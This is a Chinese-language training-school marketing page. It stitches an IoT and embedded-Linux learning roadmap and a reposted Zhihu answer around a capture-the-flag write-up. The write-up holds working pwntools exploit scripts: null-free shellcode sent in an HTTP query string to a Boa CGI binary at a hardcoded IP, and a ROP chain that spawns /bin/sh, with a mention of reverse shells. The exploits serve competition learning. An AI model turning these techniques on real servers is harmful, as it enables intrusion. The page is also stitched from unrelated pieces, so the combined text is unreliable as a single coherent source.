整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
多在家自學物聯網的朋友,也許大部分的人都沒有一個基本的學習路線,在家里很盲目的學習,結果花費幾年的時間,還是感覺一無所成,原因就是沒有一個完整的學習路線!不管我們平時做什么事情,相信大家每個人應該都是在自己的腦海里先規劃出一個計劃或者說一個路線,以免亂了思緒!
當然對于學習來說,我們更應該有一個完整的學習路線了!
千鋒教育經過市場調研和當前企業項目經驗總結,撰寫了一套專業的物聯網課程學習路線,想要了解物聯網的學習路線,你看這個就足夠了!
第一階段:嵌入式高級C語言
Linux系統
Linux Ubuntu操作系統安裝、使用、Linux常用命令、samba服務器、SSH遠程登錄、GCC編譯器、GDB調試器、VI編輯器
嵌入式C語言高級編程
1、C數據類型、控制語句
2、C程序結構設計、數組、函數、預處理
3、指針及字符串操作
4、結構體、共用體、宏、枚舉
5、文件I/O操作
數據結構及算法
1、數據結構之單向鏈表、雙向鏈表
2、數據結構之隊列、棧
3、數據結構之樹、圖
4、算法之各種排序(選擇法、冒泡法、插入法等)
5、遞歸
6、算法之二分查找
第二階段:嵌入式設備及GUI開發
嵌入式環境配置與開發工具學習
Linux下項目管理工具Make以及Makefile工作原理及其編寫Linux下shell腳本相關知識及其編寫嵌入式開發環境的基本概念及其搭建A53開發板介紹、設備使用、A53開發板與電腦通信、交叉編譯
GUI圖形界面開發
常用控件——button、label、text edit等常用布局方式——水平布局、垂直布局、固定布局、網格布局、相對布局等常用事件及信號處理技術——信息回調、鼠標、鍵盤事件等時間編程、數據存儲、繪圖機制、定時器處理、多任務處理等
第三階段:嵌入式Linux高級程序設計
1、Linux系統調用概念
2、進程相關概念、多進程實現多任務開發
3、進程間通信:無名管道、命名管道、信號、消息隊列、共享內存等
4、多線程實現多任務開發
5、多任務的同步互斥開發:互斥鎖、信號量
第四階段:Linux高級網絡程序設計
1、網絡相關概念及網絡發展
2、TCP/IP協議
3、socket編程、TCP網絡編程、UDP網絡編程、Web編程開發等
4、Linux網絡應用程序開發,Linux網絡編程相關 5、TCP協議服務器的編程方法和并發服務器的實現
6、HTTP協議及其實現方法,熟悉UDP廣播、多播的原理及編程方法,掌握混合C/S架構網絡通信系統的設計
7、IPv6與IPv4協議,及其編程接口
8、網絡數據通信過程
9、網絡原始套接字概念及編程接口
第五階段:數據庫及web編程開發
數據庫及web編程開發
1、數據庫概念、數據庫類型
2、Sqlite數據庫介紹及其安裝與移植
3、SQL數據庫語言(數據定義語言(DDL)、數據操作語言(DML)、數據查詢語言(DQL)、數據控制語言(DCL))br 4、Sqlite數據庫C語言編程中的各種SQL指令執行函數完成對數據庫的控制
5、HTML語言開發
6、Java語言開發
7、AJAX開發
8、cgi程序開發
第六階段:C++面向對象高級語言程序設計
1.熟悉面向對象的語言概述
2.熟練掌握c++語言的基本知識和類與對象及其高級應用
3、作用域運算符、內聯函數、強制類型轉換
4、new、delete內存管理
5、對象成員、成員函數
6、構造函數、析構函數、拷貝構造函數、函數重載
7、對象數組、this指針、枚舉、
8、靜態成員、靜態成員函數
9、對象成員
10、友元
11、封裝、繼承、多繼承、多態
12、虛函數、純虛函數、抽象類、虛析構函數 等
第七階段:物聯網
1、了解物聯網、泛在網、互聯網基本要領及其關系
2、熟悉RFID從低頻段到高頻段的基本工作原理,以及RFID標簽的種類與行業應用,讀卡器原理與通信過程
3、熟悉TI的cc2530的基本應用,包含基本硬件資源,協議棧相關接口使用,以及點對點通信、星形通信、廣播通信、綁定通信,三種網絡結構star、tree、mesh,掌握zibgee相關微控制處理芯片
4、了解zigbe協議棧組成,以及zigbee在通信、組網、搖控等領域的不同應用
5、通過Bluetooth、wifi和zigbee技術對比各自的優缺點,并重點介紹zigbee的各種應用
6、掌握溫度、濕度、光照、PH值、二氧化碳等傳感器的工作原理及通信接口
7、了解NB-IOT基本概念及移運BC95模塊
8、熟悉CoAP協議在NB-IOT中的應用
9、掌握常用AT指定集
第八階段:CortexA53 Linux平臺驅動開發
1、了解ARM處理器基本特征及工作原理
2、掌握ARM裸機程序開發以及裸機編譯工具的使用
3、嵌入式Bootloader原理分析及其移植
4、嵌入式Linux內核結構分析及其移植
5、掌握嵌入式Linux根文件系統組成分析及其制作過程
6、掌握嵌入式Linux三大類設備驅動基本概念
7、掌握Linux字符驅動框架及GPIO輸入輸出驅動
8、Linux中斷機制處理及響應過程
9、Linux下SPI/IIC/UART串行通信技術驅動編寫與應用
10、Linux下input設備驅動框架介紹
11、Linux下platform機制設備驅動框架介紹
12、Linux下kfifo緩沖機制、并發與競態(如互斥鎖與信息號等)講解
13、Linux驅動中的阻塞與非阻塞
14、Linux下塊設備驅動框架——RAMdisk驅動實例編寫
15、USB設備硬件設計原理、驅動協議架構、驅動開以流程
16、了解Linux設備驅動模型(kobject、kset、子系統、底層sysfs操作、虛擬總線等)
第九階段:項目實操
項目一:智能家居項目
本項目實現設備的本地控制與遠程控制,對開關量設備,能夠實現信息采集類設備的控制如溫濕度,能夠實現監控類設備的控制如視頻監控,安全系統如外人入侵能夠自動通過GPRS報警。項目涉及技術c語言、多任務開發、網絡socket開發、boa網絡服務器、CGI編程、html網頁設計等
項目二:智能人臉識別項目
本項目首先通過opencv庫的使用來實現人臉基本訓練模型檢測、再深入學習通過人臉識別以及實時抓取圖像分析并識別,了解認識opencv、dlib等開源工具
物聯網的學習從來都不是那么簡單的,不要想著一下就成材,先從基礎開始學習,慢慢加深!
次的 PWNHUB 內部賽的兩道題目都不是常規題,babyboa 考察的是 Boa Webserver 的 cgi 文件的利用,美好的異或考察的則是通過逆向分析解密函數來構造棧溢出 ROP。兩道題目的考點都非常新穎,其中第一道題更是結合了 Web,值得大家復現學習。私信回復:資料!
這道題的外表就是一個 Web 頁面
但是實際上他的主要內容都在 cgi 文件中
cgi 文件是使用靜態編譯的,這在線下比賽的題目中是非常常見的,所以學會如何還原靜態庫的符號信息非常重要,所以這里我們第一步先嘗試著還原靜態庫的符號信息。
還原靜態庫的信息一般用的是 IDA 提供的 FLIRT,這是一種函數識別技術,即庫文件快速識別與鑒定技術(Fast Library Identification and Recognition Technology)。可以通過 sig 文件來讓 IDA 在無符號的二進制文件中識別函數特征,并且恢復函數名稱等信息,大大增加了代碼的可讀性,加快分析速度。
而標準庫的 sig 文件也有現成制作好的,在https://github.com/push0ebp/sig-database中下載,并且把文件導入到 IDA/sig/pc 中就能夠使用,我這里為了快速找到我們導入的 sig 文件,將該文件夾中原有的文件都放到了 bak 目錄下,把我們猜測可能會用到的符號文件放置到目錄下
導入后再在 IDA 中按 Shift + F5,打開“List of applied library modules”頁面
然后再按 INS 并選擇要自動分析特征還原的靜態庫文件
我這里測試多次后選擇的是 Ubuntu 16.04 libc6(2.23-0ubuntu6/amd64),如果你不知道靜態編譯使用的是哪個版本的庫文件,可以嘗試多導入幾個版本的文件進行測試。
導入之后可以看到識別到了 623 個函數,并且大部分函數都有了名稱
在 Web 頁面中輸入密碼可以抓到如下的包
也就是實際上 Web 頁面就是用來向后端的 cgi 傳遞參數,并且在 cgi 中判斷密碼信息
main 函數中分別判定了 REQUEST_METHOD 和 QUERY_STRING 是否正確,這兩個參數分別代表的是訪問的模式和傳遞的參數,在上面例子中應該是 GET 和 password=wjh。
通過初步的判斷之后,就把參數的 127 字節復制到 bss 段上的一塊內容上,并且通過 handle 函數來處理參數信息。
在這個函數中先把棧上的數據清 0,再把參數從第 9 位開始復制到棧上,從九位開始的原因是為了從 password=wjh 中取出 wjh 這個字符串用于判斷,因為這個才是 Web 中真正輸入的密碼信息。
在棧上儲存參數信息的只有 0x80 個字節,但是在前面獲取參數的時候對長度沒有限制,所以我們只要在參數中避免\x00 ,就可以造成棧溢出來進行后續的利用。
但是沒有\x00 想要構造出 ROP 實在是不能夠想象(因為地址中肯定會有\x00 數據),所以我這個時候對程序進行了 checksec
發現在程序中的保護是全關的,并且在進入 handle 函數之前有復制我們傳入的參數到 bss 段上,這意味著我們只需要把返回地址修改為 bss 段上的參數,并且把這一段參數構成為沒有\x00 的 shellcode,就可以執行 shellcode 控制程序流程。
有了上述的思想之后,我們只需要考慮的就是如何構造 shellcode,以及如何調試等這些細節上的問題。
由于程序就是 amd64 架構的程序,所以我們實際上能夠直接的執行這個文件,但是由于我們沒有傳入參數的兩個環境變量,所以我們也無法成功進入 handle 函數流程。
我這里使用的方法是直接 nop 掉 GET 參數的那部分判斷,然后 patch getenv(“QUERY_STRING”)為 read 函數,具體的匯編代碼如下。
程序中的 .eh_frame 這段空間是有執行權限的,如果直接 patch 程序的字節不夠實現我們想要的功能,那么我們只需要直接在這段空間上寫匯編代碼,并且使想要 patch 的地方 call 這個地址即可,并且在修改之后返回到原來的位置。
而且 getenv 函數是以 rax 作為返回的值,內容是一個指向返回數據的指針,所以我們自己寫的這個函數也需要實現這樣的一個功能,我隨便在 bss 段上找了一段空間,并且用 sys_read 讀取內容,經過這樣的修改我就可以成功的調試。
這里的 shellcode 比起之前所遇到的一些 shellcode 編寫的題目要簡單的多,關鍵點就在于這里的 shellcode 只需要沒有\x00 即可,因為有了\x00 就會截斷 Web 數據包的后續內容,導致 BOA Web 服務器無法正常的解析。
接下來只需要正常的編寫 shellcode 即可,一般可能會遇到\x00 的地方就是引用一個內存地址,由于地址常常是 0x400000 這樣的,最高的兩個字節是\x00。我這里用的方法是異或 0x01010101 來避免地址最高兩位的\x00。
orw 部分的 shellcode 直接用 pwntools 生成即可,使用以下命令就可以自動的生成出代碼
pwnlib.shellcraft.amd64.linux.cat("/flag")
除了用 cat 的方法,也可以考慮使用反彈 shell 的方法,這樣的話也就不用考慮到 502 報錯的問題,因為不需要 flag 的回顯內容。
回答這個問題的答案,就有些接近現實生活中的 PWN 的意味了,這也就是為了我需要專門寫 Writeup 來說明這道題目。這個問題是讓我糾結很久的一個問題,直到我下載了 BOA 的源碼查看,我找到了它報錯 502 的位置。
這一段是 BOA 的源碼,我發現當他判斷 cgi 文件中沒有\n\r\n 或者\n\n 這樣的字符串的時候,就會報錯 502。
而正常來說 cgi 文件中一定是會返回這樣的字符串的,所以會運行正常。但是在 cgi 文件發生異常退出的時候,并沒有把緩沖區中的數據進行輸出,常規的 pwn 題都會在題目中使用 setbuf 來設置緩沖區的長度為 0,使得程序可以實時輸出。而如果程序有緩沖區的話,直到緩沖區滿了或者執行_IO_fflush 才會把數據內容全部輸出。
在常規的程序中,雖然沒有顯式的去調用_IO_flush,但是默認會使用 _libc_start_main 來啟動函數,而 exit 在_libc_start_main 中被自動調用,并且在 exit 又有去調用函數來檢查每個緩沖區中是否有內容,如果存在內容則輸出內容,所以這使得緩沖區的內容一定被輸出。
綜上所述,我們需要在 shellcode 之后再加入一段代碼使其調用 exit 來正常的退出程序,使得緩沖區被輸出。
from pwn import *
context.log_level="debug"
context.arch="amd64"
def test(payload):
sh=remote('47.99.38.177', 20001)
data='''GET /cgi-bin/Auth.cgi?{0} HTTP/1.1
Host: 47.99.38.177:20001
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
'''.format(payload)
sh.send(data)
sh.interactive()
DEBUG=False
exit_addr=0x400e26
shellcode_addr=0x6D26C0
shellcode='''
mov eax, 0x01410f27;
xor eax, 0x01010101;
jmp rax;
'''
shellcode=pwnlib.shellcraft.amd64.linux.cat("/flag") + shellcode
shellcode=asm(shellcode).ljust(0x50, '\x90')
payload=shellcode + 'a' * (0x91 - len(shellcode)) + '\xC0\x26\x6D'
if DEBUG:
sh=process('./Auth.cgi')
gdb.attach(sh, "b *0x0000000000400AD5")
sh.sendafter("charset:utf-8", payload)
sh.interactive()
else:
test(payload)
執行腳本之后 flag 存在于所有數據之前,這是因為直接通過 orw shellcode 輸出的 flag 數據不需要經過緩沖區,而其他數據在執行 exit 過程中才從緩沖區中輸出,這正印證了我們之前的想法。
這道題目其實考察的是 逆向算法 + 簡單的棧溢出
可以先看看幾個函數分別干了什么
其實看到這幾個函數,就可以大概猜到程序的加密是使用的魔改的 RC4 加密(把 RC4 加密中的 0x100 改為了 0x200)。
識別 RC4 加密的關鍵實際上就在于它的初始化秘鑰代碼,也就是循環對 s[i]進行賦值,賦值的內容就是為 i,另一個特征就是他的交換過程中的計算出的下標(s[i] + k[i] + v1) % 0x100,只需要看到類似的交換代碼,就可以直接確定是 RC4 加密。
但由于 RC4 加密的本質操作就是通過得到異或數據進行異或,所以我們實際上只需要動態調試得到異或的數據并記錄即可,在加解密的時候不需要考慮是什么加密,只需要對操作的內容進行異或。
下面這一段就是對內容進行異或運算,encode 函數經過混淆代碼非常的復雜,但是我們實際上通過前面的函數就可以猜測到這個函數的功能,也就是將數據進行異或。
因為異或的數據是固定的,所以實際上這里傳入的數據如果全都是\x00,就可以直接得到異或的秘鑰,我覺得這里的實現是存在一定的問題的,這使得對代碼的分析實際并不必要,只需要提取出異或的內容即可。
我這里編寫程序來提取出異或的數據
#include <cstdio>
#include <cstring>
unsigned int sz[10];
void rc4_init(unsigned int* s, unsigned char* key, unsigned long Len)
{
int i=0, j=0;
unsigned char k[0x200]={ 0 };
unsigned int tmp=0;
for (i=0; i < 0x200; i++)
{
s[i]=i;
k[i]=key[i % Len];
}
for (i=0; i < 0x200; i++)
{
j=(j + s[i] + k[i]) % 0x200;
tmp=s[i];
s[i]=s[j];
s[j]=tmp;
}
}
void rc4_crypt(unsigned int* s, unsigned int* Data, unsigned long Len)
{
int i=0, j=0, t=0;
unsigned long k=0;
unsigned int tmp;
for (k=0; k < Len; k++)
{
i=(i + 1) % 0x200;
j=(j + s[i]) % 0x200;
tmp=s[i];
s[i]=s[j];
s[j]=tmp;
t=(s[i] + s[j]) % 0x200;
Data[k] ^=s[t];
}
}
int main()
{
unsigned int s[0x200];
unsigned char key[]="freedomzrc4rc4jwandu123nduiandd9872ne91e8n3n27d91cnb9496cbaw7b6r9823ncr89193rmca879w6rnw45232fc465v2vt5v91m5vm0amy0789";
int key_len=strlen((char *)key);
for (int i=0; key[i]; i++)
key[i]=6;
rc4_init(s, key, key_len);
rc4_crypt(s, sz, 10);
for (int i=0; i < 10; i++)
printf("0x%02X, ", sz[i] % 0x100);
return 0;
}
異或之后的內容,前八位是數據位,后兩位是校驗位。我們只需要根據程序的邏輯正向的推出數據的校驗位即可。
異或之后賦值給棧上的數組,并且由于之前讀入的數據長度是 0xE0,計算后發現實際上超出了棧空間的大小,從而產生了棧溢出。由于程序沒有開 pie,所以這里就是 ret2csu + ret2libc 即可。直接在 bss 段上寫/bin/sh\x00,pop rdi 賦值 rdi 后,然后再調用 system 就可以 getshell。
這里有個不清楚的問題就是如果我直接調用 plt 上的 system,本地可以直接打通,但是遠程會報錯。如果有師傅知道這個問題的原因麻煩指教一下,因此我這里最后是借助程序本身使用的 system 那段 gadget 來執行 system,發現可以正常執行。
from pwn import *
elf=None
libc=None
file_name="./main"
# context.timeout=1
def get_file(dic=""):
context.binary=dic + file_name
return context.binary
def get_libc(dic=""):
libc=None
try:
data=os.popen("ldd {}".format(dic + file_name)).read()
for i in data.split('\n'):
libc_info=i.split("=>")
if len(libc_info)==2:
if "libc" in libc_info[0]:
libc_path=libc_info[1].split(' (')
if len(libc_path)==2:
libc=ELF(libc_path[0].replace(' ', ''), checksec=False)
return libc
except:
pass
if context.arch=='amd64':
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
elif context.arch=='i386':
try:
libc=ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
except:
libc=ELF("/lib32/libc.so.6", checksec=False)
return libc
def get_sh(Use_other_libc=False, Use_ssh=False):
global libc
if args['REMOTE']:
if Use_other_libc:
libc=ELF("./libc.so.6", checksec=False)
if Use_ssh:
s=ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
return s.process(file_name)
else:
return remote(sys.argv[1], sys.argv[2])
else:
return process(file_name)
def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
int_mode=False):
if start_string !=None:
sh.recvuntil(start_string)
if libc==True:
return_address=u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
elif int_mode:
return_address=int(sh.recvuntil(end_string, drop=True), 16)
elif address_len !=None:
return_address=u64(sh.recv()[:address_len].ljust(8, '\x00'))
elif context.arch=='amd64':
return_address=u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
else:
return_address=u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
if offset !=None:
return_address=return_address + offset
if info !=None:
log.success(info + str(hex(return_address)))
return return_address
def get_flag(sh):
sh.recvrepeat(0.1)
sh.sendline('cat flag')
return sh.recvrepeat(0.3)
def get_gdb(sh, gdbscript=None, addr=0, stop=False):
if args['REMOTE']:
return
if gdbscript is not None:
gdb.attach(sh, gdbscript=gdbscript)
elif addr is not None:
text_base=int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
log.success("breakpoint_addr --> " + hex(text_base + addr))
gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
else:
gdb.attach(sh)
if stop:
raw_input()
def Attack(target=None, sh=None, elf=None, libc=None):
if sh is None:
from Class.Target import Target
assert target is not None
assert isinstance(target, Target)
sh=target.sh
elf=target.elf
libc=target.libc
assert isinstance(elf, ELF)
assert isinstance(libc, ELF)
try_count=0
while try_count < 3:
try_count +=1
try:
pwn(sh, elf, libc)
break
except KeyboardInterrupt:
break
except EOFError:
if target is not None:
sh=target.get_sh()
target.sh=sh
if target.connect_fail:
return 'ERROR : Can not connect to target server!'
else:
sh=get_sh()
flag=get_flag(sh)
return flag
def encode(data):
all_data=""
for i in range(len(data) // 8):
xor_data=[0x67, 0x3A, 0xDB, 0x9F, 0x21, 0x84, 0xDD, 0x24, 0x7C, 0x15]
d=[ord(data[i * 8 + j]) for j in range(8)]
s=((d[7] + (d[6] << 8) + d[5] + (d[4] << 8) + d[3] + (d[2] << 8) + d[1] + (d[0] << 8)) >> 31) >> 24
c=((s + d[7] + d[5] + d[3] + d[1]) & 0xff - s + 0x100) & 0xff
d=data[i * 8: (i + 1) * 8] + p16(c)
all_data +=''.join(chr(ord(d[i]) ^ xor_data[i]) for i in range(10))
return all_data
def pwn(sh, elf, libc):
context.log_level="debug"
pop_rdi_addr=0x42cd13
buf_addr=0x68F2C0
sh_data='/bin/sh\x00\x7C\x71' * (0x68 // 8)
# sh_data='sh\x00\x00\x00\x00\x00\x00\x7C\x8C' * (0x68 // 8)
payload=p64(pop_rdi_addr) + p64(buf_addr) + p64(0x40099B)
payload=sh_data + encode(payload)
# gdb.attach(sh, "b *0x0000000000400B9D")
sh.sendafter('enter:', payload)
sh.interactive()
if __name__=="__main__":
sh=get_sh()
flag=Attack(sh=sh, elf=get_file(), libc=get_libc())
sh.close()
log.success('The flag is ' + re.search(r'flag{.+}', flag).group())
這次的 babyboa 這道題目是我最接近現實生活中的漏洞利用的一次,也嘗試了像反彈 shell 這樣的操作。畢竟 CTF 中的 pwn 題目和現實生活中的二進制漏洞相差甚遠,通過這樣慢慢的嘗試和努力,希望可以讓我從做題走向現實生活這個大靶場,挖掘出真正的漏洞,試試私信回復資料。
乎問題:
求問如何學習嵌入式開發?
本人電氣小白,目前正在自學嵌入式軟件開發,對單片機不甚了解,只知道二進制0和1,也能理解程序說白了就是無數個選擇(既0和1)組成的,但單片機內部電路長什么樣子,程序寫進去后又變成了什么樣子,單片機c語言程序的組成有哪些(如控制邏輯,存放地址等等),完全一模一樣的c語言程序能否寫入不同的單片機中,求大佬們解答一二。
下面是答主“cdfarsight”的高贊回答,讓我們一起來學習一下圈內大佬是怎么學習嵌入式的吧!
01
前言
近幾年,嵌入式系統產品漸漸完善,并在全世界各行業得到廣泛應用。2004年,全球嵌入式系統產品的產值已達2000億美元,國內嵌入式軟件的產值也達到600億人民幣。目前,嵌入式系統產品的研制和應用已經成為我國信息化帶動工業化、工業化促進信息化發展的新的國民經濟增長點。
隨著消費家電的智能化,普及化,嵌入式應用逐漸凸顯。日常生活離不開的的手機、平板、智能音響、數字相機、機頂盒、穿戴設備、智能玩具也在不斷地推陳出新;汽車電子、智能家電、醫療器械等領域也是競爭激烈。據預測,隨著Internet的迅速發展和廉價微處理器的出現,嵌入式領域將獲得飛速的發展。
02
學習路線
對于入門不久的新人來說,好的學習路線往往能事半功倍。排除掉專業領域的深耕式學習,那么一個合格的嵌入式軟件工程師應當具備哪些技能亦或者素質呢?筆者覺得可以從以下幾個方面入手:
A 嵌入式軟件編程的基礎
這一階段重點打好嵌入式軟件編程的基礎,包括學習Linux系統的基本應用,Linux的常用命令、C語言編程基礎、常用的數據結構。
特別是C語言中對指針的理解和應用。這一階段的主要目的是學習編程語言、開發環境、和培養自己的編程思維,為進一步學習嵌入式開發打下良好的基礎。必學內容有:Linux Ubuntu操作系統安裝、使用、Linux常用命令、samba服務器、SSH遠程登錄GCC編譯器、GDB調試器、VI編輯器
1)嵌入式C語言基本語法,指針及數組操作;
2)C語言高級語法:結構體、共用體、宏、枚舉;
3)數據結構;
4)Linux系統基本使用及配置;
5)Linux下Makefile工作原理及其編寫;
6)Linux下shell腳本相關知識及其編寫;
推薦的嵌入式學習書籍:《C程序設計語言》《大話數據結構》《Linux與Unix Shell 編程指南》《Linux就該這么學》
B 嵌入式Linux高級程序設計
這一階段主要學習上層的嵌入式Linux應用程序開發,包括基于Linux多進程、多線程、文件與目錄。掌握進程和線程編程思想才是打開技術學習的大門,不然永遠是停留在語法、算法層面,無法深入解決眾多實際問題。
1)Linux系統調用概念;
2)文件I/O操作相關函數使用;
3)進程相關概念、及基本控制函數;
4)無名管道、命名管道、信號、消息隊列、共享內存、信號量集合;
5)多進程、多線程實現多任務開發;
6)多任務的同步互斥開發:互斥鎖、自旋鎖、讀寫鎖、信號量、條件變量;
這一階段推薦書籍:《UNIX環境高級編程》《嵌入式Linux應用程序開發詳解》
C Linux高級網絡程序設計
這一階段主要掌握網絡應用的CS架構編程方法,套接字編程接口及框架;同時掌握必要的數據庫操作及函數,具備系統編程的綜合素質。這一階段的主要內容有:
1)網絡相關概念及網絡發展
2)socket編程、TCP網絡編程、UDP網絡編程、Web編程開發等
3)Linux網絡應用程序開發,和并發CS服務器的實現
4)熟悉UDP廣播、多播的原理及編程方法;
5)網絡原始套接字概念及編程接口,及套接字屬性設置;
6)HTTP協議及其實現方法;
6)數據庫概念、數據庫類型、常見數據庫
7)SQLite數據庫介紹及其安裝與移植
這一階段推薦的書籍:《TCP-IP詳解卷》《UNIX環境高級編程》、《Unix網絡編程》
D C++面向對象高級語言程序設計
這個階段主要學習C++思想及項目框架相關知識,C++語言作為一門高級語言,其語法復雜度比較復雜,學好并不是件容易的事情。此外、其編程思想是其精華所在,融會貫通后有無招勝有招的特效。
1)熟悉面向對象的語言概述
2)熟練掌握C++基本語法
3)封裝、繼承、多繼承;
4)多態:虛函數、抽象類、模板;
5)標準模板庫STL的使用及原理;
6)UML建模及設計模式;
7)各種網絡庫、數據庫、IO庫、線程庫的使用;
8)Qt對C++的擴展及使用;
這一階段推薦書籍:《C++ Primer》《The Standard C Library》《大話設計模式》《Qt Creator快速入門》《Qt5開發及實例》
E ARM結構及驅動開發
這階段主要了解芯片程序開發相關內容,包含STM32開發、匯編指令、ARM處理器工作原理等底層編程內容,學習這一階段有助于理解內存、寄存器、系統、任務機制等底層概念,提高程序員的編程修養,屬于點睛之筆。這階段的學習內容包括:
1)單片機基礎(匯編指令、時鐘、GPIO、定時器、中斷);
2)A53開發板介紹、設備使用、交叉編譯
3)Keil下匯編指令編寫;
3)通信總線UART、IIC、SPI及傳感器模塊的使用;
4)STM32開發流程;
5)uCos微型系統移植及使用;
6)Linux系統移植及使用;
這個階段推薦書籍:《Linux內核設計與實現》《Linux設備驅動程序》《Linux設備驅動開發詳解》
F 常用通信模塊學習
這個階段需要學習現有的工程模塊的使用及原理,涉及RFID、紅外、2.4G、Bluetooth、ZigBee、NB-IOT、Lora等。當然不要求全部完全的掌握,起碼能達到會用的狀態。具體來說這個階段包含的內容有:
1)RFID工作原理,以及讀卡器原理與通信過程;
2)紅外遙控的原理及使用;
3)2.4G無線模塊的配對及使用;
4)Bluetooth模塊通信原理及使用;
5)TI的CC2530的基本應用,Zibgee相關微控制處理芯片;
6)NB-IOT基本概念及熟悉CoAP協議在中的應用;
7)Lora模塊的使用;
8)掌握溫度、濕度、光照、PH值、二氧化碳等傳感器的工作原理及通信接口;
這個階段沒有推薦技術書籍,但感興趣可以看一下傳感器技術相關的書籍通信原理相關書籍,或者一些官方的介紹手冊;
03
推薦嵌入式項目
嵌入式技術關鍵在于理論和實踐的結合,要能夠學以致用,完成了以上的所有階段的知識點學習后,到底有沒有學會,會不會用,能不能應用所學知識來解決實際開發中的問題,我們需要來完成一個綜合的嵌入式實訓項目,例如:
項目一:智能家居項目
本項目實現設備的本地控制與遠程控制,對開關量設備,能夠實現信息采集類設備的控制如溫濕度,能夠實現監控類設備的控制如視頻監控,安全系統如外人入侵能夠自動通過GPRS報警。項目涉及技術c語言、多任務開發、網絡socket開發、boa網絡服務器、CGI編程、html網頁設計等
項目二:智能人臉識別項目
本項目首先通過opencv庫的使用來實現人臉基本訓練模型檢測、再深入學習通過人臉識別以及實時抓取圖像分析并識別,了解認識opencv、dlib等開源工具
項目三:RFID智能門禁項目
本項目實現RFID卡識別,用戶信息注冊、修改、刪除、語音播報提示可按不同的查詢條件查詢,可實現考勤
項目四:多媒體播放器項目
實現帶有圖形界面的音樂播放、暫停、上一曲、下一曲、歌曲列表歌詞同步等播放器功能,涉及到的知識點有c語言、數據結構鏈表、Linux多進程、多線程、進程間通信、同步互斥等
項目五:智能手機設計項目
本項目能夠實現智能手機接打電話、來電顯示、收發中英文短信,查看短信、信號強度檢測、運營商檢測。項目涉及到的技術GPRS AT指令集、Linux多進程、多線程、進程間通信、同步互斥、GUI圖形開發等
項目六:智慧教室項目
本項目可通過NB-IOT等標準物聯網通信協議是實現現代化資源統籌管理,基本功能是實現教室燈控、空調、通風、窗簾、門禁、人流等實時遠程監控,以實現聯動、手動控制和數據采集分析
這些項目都綜合應用了嵌入式開發當中的應用,驅動和QT開發技術。
以上就是我建議的比較系統的嵌入式學習路線。系統學習并能靈活應用以上知識后,嵌入式基本上就算入門了,具備企業項目的嵌入式研發能力了,這時候去應聘企業的嵌入式研發工程師崗位就不會有什么問題了。
看到這里,你對嵌入式有沒有一些把握了呢?
歡迎留言討論噢~
參考鏈接:
https://www.zhihu.com/question/454411605/answer/1834680462
關注我們,一起學習更多IT知識!
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
